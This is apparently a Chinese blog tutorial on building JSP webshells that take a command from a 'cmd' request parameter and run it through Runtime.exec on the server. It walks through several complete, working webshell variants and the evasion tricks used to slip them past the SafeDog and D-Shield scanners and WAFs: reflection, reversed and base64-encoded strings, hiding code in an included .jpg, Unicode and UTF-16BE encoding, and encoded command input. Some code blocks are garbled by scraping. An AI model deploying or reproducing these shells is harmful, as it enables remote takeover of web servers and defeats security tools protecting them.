Jsp Webshell 免杀-命令执行

前言

php的一句话木马即可以直接命令执行又可以作为冰蝎、蚁剑的客户端,而java就显得比较复杂。在经过java基础学习之后,尝试对java命令执行的webshell进行免杀处理。

命令执行

在之前的 Java 命令执行 中学习了执行系统命令的几个类。
这次我们还是以经典的Runtime类来测试。

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%
out.print(System.getProperty("os.name").toLowerCase());
String  cmd = request.getParameter("cmd");
if(cmd != null){
    Process p =  Runtime.getRuntime().exec(new String[]{"cmd.exe","/c",cmd});
    InputStream input = p.getInputStream();
    InputStreamReader ins = new InputStreamReader(input, "GBK");
    BufferedReader br = new BufferedReader(ins);
    out.print("
");
    String line;
    while((line = br.readLine()) != null) {
        out.println(line);
    }
    out.print("
"); br.close(); ins.close(); input.close(); p.getOutputStream().close(); } %>

该文件有着明显的exec危险代码。

image.png

反射

利用反射来免杀webshell是常用技术之一。反射的编写过程参考Java 反射机制学习

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%
    out.print(System.getProperty("os.name").toLowerCase());
    String  cmd = request.getParameter("cmd");
    if(cmd != null){
        Class clazz = Class.forName("java.lang.Runtime");
        Constructor declaredConstructor = clazz.getDeclaredConstructor();
        declaredConstructor.setAccessible(true);
        Object o = declaredConstructor.newInstance();
        Method show = clazz.getDeclaredMethod("exec", String[].class);
        String[] cmds = new String[]{"cmd.exe","/c",cmd};
        Object invoke = show.invoke(o,(Object)cmds);
        Process p = (Process) invoke;
        InputStream input = p.getInputStream();
        InputStreamReader ins = new InputStreamReader(input, "GBK");
        BufferedReader br = new BufferedReader(ins);
        out.print("
");
        String line;
        while((line = br.readLine()) != null) {
            out.println(line);
        }
        out.print("
"); br.close(); ins.close(); input.close(); p.getOutputStream().close(); } %>

还可以通过base64编码的方式将关键字符串java.lang.Runtime编码起来。

String a = new String(Base64.getDecoder().decode("amF2YS5sYW5nLlJ1bnRpbWU="));
System.out.println(a);

又或者创建一个方法来反转字符串。

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%!public static String reverseStr(String str){return new StringBuilder(str).reverse().toString();}%>
<%
    out.print(System.getProperty("os.name").toLowerCase());
    String  cmd = request.getParameter("cmd");
    if(cmd != null){
        Class clazz = Class.forName(reverseStr("emitnuR.gnal.avaj"));
        Constructor declaredConstructor = clazz.getDeclaredConstructor();
        declaredConstructor.setAccessible(true);
        Object o = declaredConstructor.newInstance();
        Method show = clazz.getDeclaredMethod(reverseStr("cexe"), String[].class);
        String[] cmds = new String[]{"cmd.exe","/c",cmd};
        Object invoke = show.invoke(o,(Object)cmds);
        Process p = (Process) invoke;
        InputStream input = p.getInputStream();
        InputStreamReader ins = new InputStreamReader(input, "GBK");
        BufferedReader br = new BufferedReader(ins);
        out.print("
");
        String line;
        while((line = br.readLine()) != null) {
            out.println(line);
        }
        out.print("
"); br.close(); ins.close(); input.close(); p.getOutputStream().close(); } %>
image.png

include 指令

Java Web 里有一个include指令,可以将外部文件嵌入到当前jsp语句中,并同时解析页面的jsp语句。

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ include file = "1.jpg" %>

1.jpg 编写恶意代码。

<%
    out.print(System.getProperty("os.name").toLowerCase());
    String  cmd = request.getParameter("cmd");
    if(cmd != null){
        Class clazz = Class.forName("java.lang.Runtime");
        Constructor declaredConstructor = clazz.getDeclaredConstructor();
        declaredConstructor.setAccessible(true);
        Object o = declaredConstructor.newInstance();
        Method show = clazz.getDeclaredMethod("exec", String[].class);
        String[] cmds = new String[]{"cmd.exe","/c",cmd};
        Object invoke = show.invoke(o,(Object)cmds);
        Process p = (Process) invoke;
        InputStream input = p.getInputStream();
        InputStreamReader ins = new InputStreamReader(input, "GBK");
        BufferedReader br = new BufferedReader(ins);
        out.print("
");
        String line;
        while((line = br.readLine()) != null) {
            out.println(line);
        }
        out.print("
"); br.close(); ins.close(); input.close(); p.getOutputStream().close(); } %>

访问也是可以正常执行命令。

image.png

因为安全狗、D盾主要查杀Runtime.getRuntime().exec(),在使用include的情况下可以绕过D盾无法绕过安全狗。当再次利用反射机制就可以成功绕过。

image.png

编码

Java 程序可以自动识别Unicode编码,所以我们可以将java源代码除了page指令的代码外,全部编码。
先在网上查找一个字符串与Unicode编码相互转换的类。

    public void  convert(String str) {
        str = (str == null ? "" : str);
        String tmp;
        StringBuffer sb = new StringBuffer(1000);
        char c;
        int i, j;
        sb.setLength(0);
        for (i = 0; i < str.length(); i++) {
            c = str.charAt(i);
            sb.append("\\u");
            j = (c >>> 8); //取出高8位
            tmp = Integer.toHexString(j);
            if (tmp.length() == 1)
                sb.append("0");
            sb.append(tmp);
            j = (c & 0xFF); //取出低8位
            tmp = Integer.toHexString(j);
            if (tmp.length() == 1)
                sb.append("0");
            sb.append(tmp);

        }
        System.out.print(new String(sb));
    }

再创建一个方法,通过读取文本文件的方式调用convert()方法将上面的命令执行的代码编码。

    public void test2() throws IOException {
        File srcfile = new File("a.txt");
        FileReader fileReader = new FileReader(srcfile);
        BufferedReader bufferedReader = new BufferedReader(fileReader);
        String s;
        while ((s = bufferedReader.readLine()) != null) {
            convert(s);
            System.out.print("\r\n");
        }
    }

运行后得到Unicode编码后的代码,再把原来page指令声明上即可。

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>

<%
\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u0029\u003b
\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0020\u0063\u006d\u0064\u0020\u003d\u0020\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0063\u006d\u0064\u0022\u0029\u003b
\u0069\u0066\u0028\u0063\u006d\u0064\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b
\u0020\u0020\u0020\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0020\u0070\u0020\u003d\u0020\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0022\u002f\u0063\u0022\u002c\u0063\u006d\u0064\u007d\u0029\u003b
\u0020\u0020\u0020\u0020\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u0069\u006e\u0070\u0075\u0074\u0020\u003d\u0020\u0070\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u003b
\u0020\u0020\u0020\u0020\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0052\u0065\u0061\u0064\u0065\u0072\u0020\u0069\u006e\u0073\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u0069\u006e\u0070\u0075\u0074\u002c\u0020\u0022\u0047\u0042\u004b\u0022\u0029\u003b
\u0020\u0020\u0020\u0020\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0020\u0062\u0072\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u0069\u006e\u0073\u0029\u003b
\u0020\u0020\u0020\u0020\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028\u0022\u003c\u0070\u0072\u0065\u003e\u0022\u0029\u003b
\u0020\u0020\u0020\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u006c\u0069\u006e\u0065\u003b
\u0020\u0020\u0020\u0020\u0077\u0068\u0069\u006c\u0065\u0028\u0028\u006c\u0069\u006e\u0065\u0020\u003d\u0020\u0062\u0072\u002e\u0072\u0065\u0061\u0064\u004c\u0069\u006e\u0065\u0028\u0029\u0029\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b
\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u006c\u0069\u006e\u0065\u0029\u003b
\u0020\u0020\u0020\u0020\u007d
\u0020\u0020\u0020\u0020\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028\u0022\u003c\u002f\u0070\u0072\u0065\u003e\u0022\u0029\u003b
\u0020\u0020\u0020\u0020\u0062\u0072\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b
\u0020\u0020\u0020\u0020\u0069\u006e\u0073\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b
\u0020\u0020\u0020\u0020\u0069\u006e\u0070\u0075\u0074\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b
\u0020\u0020\u0020\u0020\u0070\u002e\u0067\u0065\u0074\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b
\u007d
%>
image.png

D盾依然可以查杀,安全狗顺利绕过。
那么Unicode 编码还能怎么处理呢?Unicode编码的关键点在于以'\u'开头表明和unicode编码相关。
可以将'u'重复声明,即'\uuuuuuu'

<%
out.println("\uuuuuu006f\uuuuuuuuuuuuuuuuuu0075\uuu0074");
%>

将上面代码稍做调整

sb.append("\\uuuuu");

再次生成webshell,可成功绕过D盾。

image.png

java 同样支持其他编码格式

import chardet
import codecs

filename_in = 'webshell.txt'
filename_out = 'utf-16be_es.jsp'

with codecs.open(filename=filename_in, mode='r', encoding='utf-8') as fi:
    data = fi.read()
    with open(filename_out, mode='w') as fo:
        fo.write('<%@ page contentType="charset=utf-16be" %>')
        fo.write(data.encode('utf-16be'))
        fo.close()

如 utf-16be 编码方式

image.png

扩展

在绕过某些WAF时,WAF可能会检测jsp标签、客户端传入的参数以及威胁命令。
对应jsp标签<%%>,可以使用代替。
且不需要import导入,定义完整的类名。


    out.print(System.getProperty("os.name").toLowerCase());
    String  cmd = request.getParameter("cmd");
    if(cmd != null){
        Class clazz = Class.forName("java.lang.Runtime");
        java.lang.reflect.Constructor declaredConstructor = clazz.getDeclaredConstructor();
        declaredConstructor.setAccessible(true);
        Object o = declaredConstructor.newInstance();
        java.lang.reflect.Method show = clazz.getDeclaredMethod("exec", String[].class);
        String[] cmds = new String[]{"cmd.exe","/c",cmd};
        Object invoke = show.invoke(o,(Object)cmds);
        Process p = (Process) invoke;
        java.io.InputStream input = p.getInputStream();
        java.io.InputStreamReader ins = new java.io.InputStreamReader(input, "GBK");
        java.io.BufferedReader br = new java.io.BufferedReader(ins);
        String line;
        while((line = br.readLine()) != null) {
            out.println(line);
        }
        br.close();
        ins.close();
        input.close();
        p.getOutputStream().close();
    }

对于参数先将其存储进会话然后调用。

request.setAttribute("a",request.getParameter("cmd"));
String cmd = request.getAttribute("a").toString();

如果检测威胁命令可以对其进行编码,这里选择ASCII编码进行测试。
对应服务端代码该为:

String decode = java.net.URLDecoder.decode(cmd.replaceAll("\\\\x", "%"), "utf-8");
String[] cmds = new String[]{"cmd.exe","/c",decode};

此时既可以输入whoami,也可以输入十六进制编码后的%5c%78%37%37%5c%78%36%38%5c%78%36%66%5c%78%36%31%5c%78%36%64%5c%78%36%39

image.png

或者base64编码加反转等等都可以。

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%@ page import="java.util.Base64" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%!public static String reverseStr(String str){return new StringBuilder(str).reverse().toString();}%>
<%
    out.print(System.getProperty("os.name").toLowerCase());
    String  bs64 = request.getParameter("cmd");
    if(bs64 != null){
        String cmd = new String(Base64.getDecoder().decode(reverseStr(bs64)),"UTF-8");
        Class clazz = Class.forName("java.lang.Runtime");
        Constructor declaredConstructor = clazz.getDeclaredConstructor();
        declaredConstructor.setAccessible(true);
        Object o = declaredConstructor.newInstance();
        Method show = clazz.getDeclaredMethod("exec", String[].class);
        String[] cmds = new String[]{"cmd.exe","/c",cmd};
        Object invoke = show.invoke(o,(Object)cmds);
        Process p = (Process) invoke;
        InputStream input = p.getInputStream();
        InputStreamReader ins = new InputStreamReader(input, "GBK");
        BufferedReader br = new BufferedReader(ins);
        out.print("
");
        String line;
        while((line = br.readLine()) != null) {
            out.println(line);
        }
        out.print("
"); br.close(); ins.close(); input.close(); p.getOutputStream().close(); } %>

对应客户端传入的命令也就是base64编码后反转的字符串。

image.png

CDATA特性

在XML元素里,<&是非法的,遇到<解析器会把该字符解释为新元素的开始,遇到&解析器会把该字符解释为字符实体化编码的开始。
我们有时候需要在jspx里添加js代码用到大量的<&字符,因此可以将脚本代码定义为CDATA。
DATA部分内容会被解析器忽略。







u("123!");
out.print(System.getProperty("os.name").toLowerCase());
String  cmd = q("cmd");
    if(cmd != null){
        Class clazz = Class.forName("java.lang.Runtime");
        java.lang.reflect.Constructor declaredConstructor = clazz.getDeclaredConstructor();
        declaredConstructor.setAccessible(true);
        Object o = declaredConstructor.newInstance();
        java.lang.reflect.Method show = z("exec", String[].class);
        String[] cmds = new String[]{"cmd.exe","/c",cmd};
        Object invoke = show.invoke(o,(Object)cmds);
        Process p = (Process) invoke;
        java.io.InputStream input = p.getInputStream();
        java.io.InputStreamReader ins = new java.io.InputStreamReader(input, "GBK");
        java.io.BufferedReader br = new java.io.BufferedReader(ins);
        String line;
        while((line = br.readLine()) != null) {
            out.println(line);
        }
        br.close();
        ins.close();
        input.close();
        p.getOutputStream().close();
    }




总结

本文免杀的方式主要利用的知识点是反射和编码,可以达到简单免杀的效果。算是一个学习的切入口。在实际更为复杂的情况下,还要继续学习以类加载器等更多方式进行免杀处理。

你可能感兴趣的:(Jsp Webshell 免杀-命令执行)